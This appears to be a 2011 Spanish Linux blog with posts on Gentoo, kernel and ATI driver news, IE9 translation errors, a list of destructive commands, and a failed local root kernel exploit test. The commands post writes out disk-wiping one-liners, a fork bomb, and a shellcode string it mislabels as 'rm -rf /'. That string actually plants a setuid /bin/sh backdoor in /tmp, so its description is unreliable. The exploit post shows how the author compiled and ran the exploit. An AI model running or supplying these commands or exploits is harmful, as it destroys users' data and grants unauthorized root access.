miércoles, 22 de junio de 2011

Gentoo tan Facil?

Si tan facil fuera de tener Gentoo, hasta las chicas del anime podrian hacerlo?, LOL!!!

Fuente

sábado, 18 de junio de 2011

Recopilaciòn de comandos peligrosos

Hola, aca les traigo una lista de comandos peligrosos para GNU/Linux para evitar que les pase algo y pierdan a su precisosa distro :)

Mirar pero no ejecutar nunca como root !!:

cat /dev/urandom > /dev/sda

Mala idea, ese comando lo que hace es pasar todos los datos de urandom, al bloque del disco duro, causando que pierdas los datos y las particiones.

rm -rf /

El conocido comando mortal, este borra absolutamente todo lo que este, incluso los datos de otras particiones si es que estan montadas.

chmod -R 777 /

Chmod es una muy buena herramienta para asignar permisos, pero nunca ejecutar asi, eso dañaria la instalacion de su distro y al reiniciar seria irrancable, lo bueno es que los datos del directorio home al estar con el permiso universal 777 se pueden recuperar, pero nada mas :S desde un live cd.

dd if=/dev/random of=/dev/port

Menos mortal, pero si te puede dar molestias. Al pasar los datos de /dev/random a /dev/port causaras un kernel panic, con reinicio regresa a la normalidad.

mv /home/yourhomedirectory/* /dev/null

Esto te pasara los datos de tu home a un punto nulo /dev/null (el agujero negro de Unix), y no los podras recuperar mas

chmod 000 -R /

Otra variante del chmod usado mal, ahora el permiso 000 te denegara el acceso a todo :S, no ejecutar nunca.

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
"xffxffxffxffx68xdfxd0xdfxd9x68x8dx99"
"xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7"
"x56x04xf7x56x08xf7x56x0cx83xc4x74x56"
"x8dx73x08x56x53x54x59xb0x0bxcdx80x31"
"xc0x40xebxf9xe8xbdxffxffxffx2fx62x69"
"x6ex2fx73x68x00x2dx63x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

Version Hexadecimal del rm -rf /, puede pasar desapercibida hasta en los usuarios mas expertos, ni se les ocurra ejecutarla.

mkfs.ext3 /dev/sda

Esto elimina los datos del dispositivo seleccionado, no hacerlo o perderan sus datos.

cat /dev/input/mouse0 > /dev/sda

Otro comando peligroso, la peor manera de sacar la salida del raton, esa va directo al /dev/sda y con ello la perdida de datos, particiones, muy peligrosa.

:(){ :|:& };:

Una conocida Bomba Fork, lo que hace es crear muchos procesos hasta colapsar al sistema, y con ello obliga al reinicio del sistema, y en el peor de los casos, perdida de datos.

chmod -x chmod

Esta tambien causa que el sistema quede en mal estado.

Recuerden nunca ejecutar esos comandos como root u de otra manera o sino les causara problemas, dolores de cabeza y lo peor perdida de datos.

jueves, 16 de junio de 2011

Exploit kernel linux


Un ya reconocido exploit uno de tipo local exploit permite obtener a root, desde el kernel 2.6.30, en muchos que no han sido parcheados o sea vanilla aun funciona en esos...

link

En mi caso no funciono, lo probe en el nuevo kernel 3.0 en Gentoo, para ser exactos el 3.0_rc3.

Requerimientos:

Tener el paquete build-essential en debian o derivados ya instalado (en Gentoo ya viene con todo lo necesario ya):

#apt-get install build-essential

luego:

$gcc exploit.c -o exploit

probar:

[dexter4@Kagamine:~/Descargas_Opera/cheddar_bay]% ./exploit
[+] MAPPED ZERO PAGE!
[+] Resolved nf_unregister_hooks to 0xc13e0df6
[+] Resolved commit_creds to 0xc1033767
[+] *0x2c |= 1
[+] b00m!
[+] Disabled security of : nothing, what an insecure machine!
[+] Failed to get root :( Something's wrong. Maybe the kernel isn't vulnerable?

[dexter4@Kagamine:~/Descargas_Opera/cheddar_bay]% uname -a
Linux Kagamine 3.0.0-rc3 #1 PREEMPT Wed Jun 15 16:47:18 CLT 2011 i686 Intel(R) Pentium(R) 4 CPU 1.60GHz GenuineIntel GNU/Linux

al final no pudo obtener root, en mi caso pero casi fue, recuerden no hacer trampa y cerrar toda sesion de root anteriormente :)

Recuerden no abusar de los exploit, es solo para fines de aprendizaje, o similar...

sábado, 11 de junio de 2011

Miles de Temas de Wmaker

Me he topado con un host que aun ha mantenido vivo a los temas de Window Maker, supuestamente perdidos, eliminados, olvidados.... asi que si algun wmakero grita de felicidad al saber que aun existen tantos temas...


Saludos!!!

viernes, 20 de mayo de 2011

Disponible el núcleo de Linux versión 2.6.39

La más reciente versión del núcleo de Linux, 2.6.39, está disponible, con nuevo soporte mejoras para tarjetas ATi Candyman e Intel GMA500, entre otras cosas.

Entre lo cambios más destacado, por fin se eliminan los últimos vestigios de BKL (Big Kernel Lock); Ext4 ahora utiliza la función mblk_io_submit de modo predeterminado, misma que mejora el desempeño y mejora la escalabilidad; quien tenga interés en un muro cortafuegos con Linux, podrá utilizar el código de ipset, el cual se presume es más eficiente y fácil de administrar;

Este lanzamiento, que demoró tan solo 70 días en completarse, es evidencia de que se ha acelerado el procesos de desarrollo, pues anteriormente se demoraba de 80 a 90 días e hacer un lanzamiento.

http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.39.tar.bz2

Fuente: The H-Open

PD : aun no solucionan el problema de energia con los portatiles, para el 2.6.40 deberia de estar de solucionado, eso espero. por ahora puedes saldarlo usando otro sheduller como el BFS, etc ...

domingo, 24 de abril de 2011

Fallas IE9

Si se habran fijado Internet Explorer 9 anda mejor en maquinas windows, pero tiene fails como este:


Una descripcion de seguridad que dice:


Dice: Proteccion contra el hardware malicioso (malware), deberia decir: Proteccion contra el software malicioso (malware) xDDDDDD, salia en la pagina en español que describia eso

Y este Fallo: decia hasta cerrar windows explorer (Fail!!):






sábado, 5 de febrero de 2011

Importante actualización de los drivers libres de ATI



Ya era hora de actualizar nuestros drivers de la tarjeta gráfica. ATI acaba de liberar una actualización mayor para poder soportar nuevas tarjetas, mejorar el rendimiento de las anteriores y añadir opciones que en entornos de software libre no funcionaban. La nueva versión (6.14.0) de los drivers de X.Org añaden soporte a las Radeon HD 5000 series, Radeon HD 6000 series, y al hardware AMD Fusion Ontario.


Por supuesto, además de novedades, parchean gran cantidad de bugs con los que venían peleándose hace algún tiempo. Aún no existe un paquete oficial para facilitar la instalación de estos nuevos drivers así que si queréis instalarlos debéis compilarlos directamente desde los repositorios Git.

Las mejoras incluidas en la nueva versión pasan por el soporte para 2D EXA, aceleración hardware para la reproducción de archivos de vídeo mediante X-Video y optimización de rendimiento.


Otra importante mejora es la que incluye el KMS page-flipping, una tecnología que mejora enormemente el rendimiento de las tarjetas.

Para poder utilizar éste driver con las últimas tarjetas será necesario utilizar el kernel 2.6.38. Esto supone un pequeño problema ya que dicho kernel todavía no es estable y no se espera que salga a producción hasta dentro de unas semanas.

De todas formas, una excelente noticia para el software libre y todos los usuarios que utilicen tarjetas ATI.

Via: Phoronix

Ps: andan mejor, pero hay un bug, cuando abres una terminal como urxvt, la pantalla sale destruida y no queda mas remedio que reiniciar las X, con las demas terminales ok, y al compiz-fusion se le fue ese problema de refresco en que a veces las ventanas no recargaban

Update: si se añade en la seccion device la opcion en /etc/X11/xorg.conf:

Option "ColorTiling" "False"

reiniciar las X

se va el garbage al abrir la urxvt, y funciona normal